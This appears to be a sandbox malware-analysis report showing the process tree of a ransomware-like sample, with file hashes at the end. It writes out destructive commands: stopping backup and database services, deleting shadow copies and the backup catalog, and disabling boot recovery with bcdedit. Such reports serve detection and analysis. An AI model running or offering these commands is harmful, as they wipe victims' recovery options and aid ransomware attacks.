C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y3⤵PID:2696
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecJobEngine /y2⤵PID:2332
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵PID:2536
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecManagementService /y2⤵PID:2688
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵PID:2796
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵PID:1472
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵PID:2788
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecRPCService /y2⤵PID:2612
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵PID:2480
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop PDVFSService /y2⤵PID:2324
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵PID:2832
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MVArmor /y2⤵PID:2720
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MVArmor /y3⤵PID:1344
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VSNAPVSS /y2⤵PID:2268
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y3⤵PID:1688
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop stc_raw_agent /y2⤵PID:2780
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y3⤵PID:2460
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MVarmor64 /y2⤵PID:2772
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MVarmor64 /y3⤵PID:3028
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamTransportSvc /y2⤵PID:2224
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵PID:2196
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploymentService /y2⤵PID:1980
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵PID:2872
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcronisAgent /y2⤵PID:2176
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵PID:2996
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamNFSSvc /y2⤵PID:2204
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵PID:2252
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ARSM /y2⤵PID:2532
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ARSM /y3⤵PID:2440
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵PID:2876
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y3⤵PID:3040
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵PID:2488
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y3⤵PID:2508
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcrSch2Svc /y2⤵PID:2260
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵PID:2896
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop WSBExchange /y2⤵PID:2516
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WSBExchange /y3⤵PID:1664
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchange /y2⤵PID:3052
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchange /y3⤵PID:2432
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchange$ /y2⤵PID:2636
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchange$ /y3⤵PID:1072
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C sc delete VSS2⤵PID:2892
-
C:\Windows\SysWOW64\sc.exesc delete VSS3⤵
- Launches sc.exe
PID:2068
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet2⤵PID:2284
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete2⤵PID:2988
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2924
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2548
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no2⤵PID:3068
-
-
C:\Users\Admin\AppData\Local\Temp\lsm.exe"C:\Users\Admin\AppData\Local\Temp\lsm.exe"2⤵
- Executes dropped EXE
PID:2660 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\is64.bat" "3⤵PID:1592
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\readme-warning.hta"2⤵
- Modifies Internet Explorer settings
PID:2192
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\readme-warning.hta"2⤵
- Modifies Internet Explorer settings
PID:2112
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\readme-warning.hta"2⤵
- Modifies Internet Explorer settings
PID:2168
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\readme-warning.hta"2⤵
- Modifies Internet Explorer settings
PID:2436
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\readme-warning.hta"2⤵
- Modifies Internet Explorer settings
PID:828
-
-
C:\Windows\regedit.exe"C:\Windows\regedit.exe"1⤵
- Checks BIOS information in registry
- Checks registry for disk virtualization
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
- Runs regedit.exe
- Suspicious behavior: GetForegroundWindowSpam
PID:1632
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-29105805917322117341872501779-555228231489017842-901311302-69014629273122539"1⤵PID:908
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-7677207171376674123807820894-111515177157432553446581617-1099953911438720128"1⤵PID:2692
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y1⤵PID:2796
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y1⤵PID:2792
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2063090467-766902631-1727178232-2024082352914004413-12981707261437771733921441822"1⤵PID:2908
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "418123423226636940-412155215-1237523381575788425-1198537854-1733403418-1788878517"1⤵PID:3012
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-188430711791338906192501341138141471-1354439480-16096830111023806670107655045"1⤵PID:852
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "69669954645449524-14576202362475170371623784608-5976297381605808048-1585572388"1⤵PID:2920
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
181B
MD5225edee1d46e0a80610db26b275d72fb
SHA1ce206abf11aaf19278b72f5021cc64b1b427b7e8
SHA256e1befb57d724c9dc760cf42d7e0609212b22faeb2dc0c3ffe2fbd7134ff69559
SHA5124f01a2a248a1322cb690b7395b818d2780e46f4884e59f1ab96125d642b6358eea97c7fad6023ef17209b218daa9c88d15ea2b92f124ecb8434c0c7b4a710504
-
Filesize
3B
MD5a5ea0ad9260b1550a14cc58d2c39b03d
SHA1f0aedf295071ed34ab8c6a7692223d22b6a19841
SHA256f1b2f662800122bed0ff255693df89c4487fbdcf453d3524a42d4ec20c3d9c04
SHA5127c735c613ece191801114785c1ee26a0485cbf1e8ee2c3b85ba1ad290ef75eec9fede5e1a5dc26d504701f3542e6b6457818f4c1d62448d0db40d5f35c357d74
-
Filesize
75KB
MD57065c6c8efb58c65cbf97d1139fb3998
SHA1419e901005e12fbb7f6bbbf59e1802df4db56eb2
SHA25673b4ab2ae70beb4637920f181ba3f175374209178c86465ca92d333f034ae960
SHA5121f6883dae0d8f5d6877be5dc30f842bc8d7e1e69cbd45d723c0de3841b30ae042b4962c2b15b1b4c7f0eaf834374a6458d14f385a7934621a104157e91bea1bd
-
Filesize
75KB
MD57065c6c8efb58c65cbf97d1139fb3998
SHA1419e901005e12fbb7f6bbbf59e1802df4db56eb2
SHA25673b4ab2ae70beb4637920f181ba3f175374209178c86465ca92d333f034ae960
SHA5121f6883dae0d8f5d6877be5dc30f842bc8d7e1e69cbd45d723c0de3841b30ae042b4962c2b15b1b4c7f0eaf834374a6458d14f385a7934621a104157e91bea1bd
-
Filesize
89KB
MD537d55dba7a6114449a2453a5e5357c04
SHA134ea79d82409c679e8a5c32f5c469844dd2488d7
SHA25652003dbfea65f568115dfad09aa0402df57d488ca7f9eb23c7334a51c11deb9f
SHA512d493512c768e9412047e2ece774a670f636d9b380b63b617f8516eac6ed0de219e0daebc196549fafcd756cab1d44b87dd8cd6ddae712f529295ce9794c0a75e
-
Filesize
89KB
MD537d55dba7a6114449a2453a5e5357c04
SHA134ea79d82409c679e8a5c32f5c469844dd2488d7
SHA25652003dbfea65f568115dfad09aa0402df57d488ca7f9eb23c7334a51c11deb9f
SHA512d493512c768e9412047e2ece774a670f636d9b380b63b617f8516eac6ed0de219e0daebc196549fafcd756cab1d44b87dd8cd6ddae712f529295ce9794c0a75e
-
Filesize
75KB
MD57065c6c8efb58c65cbf97d1139fb3998
SHA1419e901005e12fbb7f6bbbf59e1802df4db56eb2
SHA25673b4ab2ae70beb4637920f181ba3f175374209178c86465ca92d333f034ae960
SHA5121f6883dae0d8f5d6877be5dc30f842bc8d7e1e69cbd45d723c0de3841b30ae042b4962c2b15b1b4c7f0eaf834374a6458d14f385a7934621a104157e91bea1bd
-
Filesize
75KB
MD57065c6c8efb58c65cbf97d1139fb3998
SHA1419e901005e12fbb7f6bbbf59e1802df4db56eb2
SHA25673b4ab2ae70beb4637920f181ba3f175374209178c86465ca92d333f034ae960
SHA5121f6883dae0d8f5d6877be5dc30f842bc8d7e1e69cbd45d723c0de3841b30ae042b4962c2b15b1b4c7f0eaf834374a6458d14f385a7934621a104157e91bea1bd